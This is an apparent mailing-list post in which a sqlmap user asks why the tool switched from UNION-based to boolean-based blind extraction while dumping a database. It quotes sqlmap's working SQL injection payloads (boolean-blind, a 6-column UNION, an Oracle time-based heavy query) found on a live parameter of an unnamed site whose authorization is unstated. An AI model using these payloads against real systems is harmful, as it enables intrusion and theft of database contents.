Hi!
I found an odd behavior on sqlmap. I throwed it and url where it found this:
Place: GET
Parameter: pub
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: XXX=' OR '1'='1' UNION ALL SELECT
NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL
FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS
T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD
So, the best way to dump the DB would be to use the UNION query since it
can retrieve the whole table at a time.
Now, the funny thing is that it actually used this for the first 4 or 5
tables, which are 5 or 6 columns wide, but then, on a table with only 3
columns it didn't. It is now using a slow-moving AND boolean-based attack
to dump the table char-by-char but I can't understand why. Any known reason
for this? Or I'm just missing something?
------------------------------------------------------------------------------
See everything from the browser to the database with AppDynamics
Get end-to-end visibility with application monitoring from AppDynamics
Isolate bottlenecks and diagnose root cause in seconds.
Start your free trial of AppDynamics Pro today!
http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
